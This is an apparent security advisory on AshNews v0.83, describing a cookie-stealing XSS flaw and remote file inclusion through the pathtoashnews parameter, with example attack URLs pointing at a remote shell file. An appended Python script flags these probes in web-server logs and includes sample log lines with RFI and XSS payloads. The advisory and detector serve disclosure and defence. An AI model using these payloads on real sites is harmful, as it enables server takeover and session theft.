###########################################################################
# Advisory #7
# Title: AshWebStudio AshNews Multiple Vulnerabilities
#
# Author: 0o_zeus_o0
# Contact: zeus@diosdelared.com
# Website: Security-mx.org
# Date: 01/02/2006
# Risk: High
# Vendor Url: http://dev.ashwebstudio.com/?section=ashnews
# Affected Software: AshWebStudio AshNews
# Non Affected:
#
# We Are: olimpus klan team
#
#Info:
#================================================================
#The cross-site scripting vulnerability allows identity hijacking
#(session takeover) by stealing the victim's cookie; this bug is in
#the file ashnews.php.
#There are also two high-severity bugs that allow remote file
#inclusion and, through it, execution of arbitrary commands on the
#server. They are rated high because they can lead to defacement of
#the site or theft of confidential information. They are in the files
#ashnews.php and ashheadlines.php: the pathtoashnews parameter is
#taken straight from the request, so an attacker can point it at a
#file on a host they control.
#
#Example cross site scripting:
#================================================================
#
#http://example.com/[ashdirpath]/ashnews.php?page=showcomments&id=
#
#Example Remote File Inclusion:
#================================================================
#http://example.com/[ashdirpath]/ashheadlines.php?pathtoashnews=http://www.example.com/shell.gif?
#
#http://www.example.com/[ashdirpath]/ashnews.php?pathtoashnews=http://www.example.com/shell.gif?
#
#The trailing "?" turns whatever the script appends to the path into
#the query string of the remote request, so the attacker's file is
#fetched and included as-is.
#
#Solution:
#================================================================
#
#Reported to the vendor; see also security-mx.org.
#
#
#VULNERABLE VERSIONS
#================================================================
#ashnews v0.83. Other versions may also be affected.
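#Added example: spotting these probes in web-server logs
#================================================================
#
#The following is an added example, not part of the original advisory
#and not AshWebStudio code. It runs a detection pass over access-log
#lines in Common Log Format and flags the two attack shapes described
#above, using only the script and parameter names the advisory gives
#(ashnews.php, ashheadlines.php, pathtoashnews, page=showcomments&id=).
#The log lines, client addresses and the XSS probe string in them are
#constructed for this example; the RFI detection also handles
#URL-encoded and double-encoded values and protocol-relative URLs,
#which goes beyond the literal examples in the advisory.

```python
"""Detect AshNews RFI / XSS probes in access logs (constructed sample data)."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Scripts and parameters named in the advisory.
RFI_PARAM = "pathtoashnews"
RFI_SCRIPTS = {"ashnews.php", "ashheadlines.php"}
XSS_SCRIPT = "ashnews.php"

# Common Log Format: host ident user [time] "METHOD target HTTP/x" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')

# A value that starts with "scheme://" or a protocol-relative "//" is a
# remote (or stream-wrapper, e.g. php://) include target, not a local path.
REMOTE_SCHEME = re.compile(r'^(?:[a-z][a-z0-9+.-]*:)?//', re.IGNORECASE)

# Constructed sample log lines (addresses from RFC 5737 documentation ranges).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Feb/2006:10:12:01 +0000] "GET /news/ashnews.php?page=showcomments&id=12 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [01/Feb/2006:10:12:07 +0000] "GET /news/ashheadlines.php?pathtoashnews=http://www.example.com/shell.gif? HTTP/1.1" 200 812',
    '198.51.100.9 - - [01/Feb/2006:10:13:44 +0000] "GET /news/ashnews.php?pathtoashnews=http%3A%2F%2Fwww.example.com%2Fshell.gif%3F HTTP/1.1" 200 812',
    '198.51.100.9 - - [01/Feb/2006:10:14:02 +0000] "GET /news/ashnews.php?page=showcomments&id=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5230',
    '192.0.2.77 - - [01/Feb/2006:10:15:30 +0000] "GET /news/ashnews.php?pathtoashnews=/var/www/news HTTP/1.1" 200 812',
]


def classify_request(target: str) -> list[str]:
    """Return a list of findings for one request target (path plus query)."""
    findings = []
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    # parse_qs decodes one layer of percent-encoding; keep empty values so
    # "id=" is still seen as present.
    params = parse_qs(parts.query, keep_blank_values=True)

    def decoded(values):
        # One extra unquote catches double-encoded payloads (%2568ttp -> http).
        return [unquote(v) for v in values]

    if script in RFI_SCRIPTS and RFI_PARAM in params:
        for v in decoded(params[RFI_PARAM]):
            if REMOTE_SCHEME.match(v.strip()):
                findings.append(f"RFI attempt: {script} {RFI_PARAM}={v}")

    if script == XSS_SCRIPT and params.get("page") == ["showcomments"]:
        for v in decoded(params.get("id", [])):
            # Markup or a javascript: URL in a numeric id is a reflected-XSS probe.
            if re.search(r"""[<>"']|javascript:""", v, re.IGNORECASE):
                findings.append(f"XSS attempt: {script} id={v}")
    return findings


def scan_log(lines) -> list[tuple[str, str, str]]:
    """Return (client_ip, timestamp, finding) for every suspicious request."""
    results = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # not CLF; skip rather than guess
        ip, ts, _method, target, _status = m.groups()
        for finding in classify_request(target):
            results.append((ip, ts, finding))
    return results


if __name__ == "__main__":
    for ip, ts, finding in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} {finding}")
```

#On the sample above the scan reports the two pathtoashnews requests
#that point at a remote URL (plain and percent-encoded) and the
#showcomments request whose id carries markup, while the request that
#sets pathtoashnews to a local path is left alone. A local path is not
#flagged here because the advisory only describes remote inclusion;
#if the same parameter can also reach local files, extend the check
#to reject ".." and absolute paths as well.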
#
#
#================================================================
#Contact information
#0o_zeus_o0
#zeus@diosdelared.com
#www.Security-mx.org
#================================================================
#greetz: lady fire, Mi beba, olimpus klan team and all security-mx
##############################################################################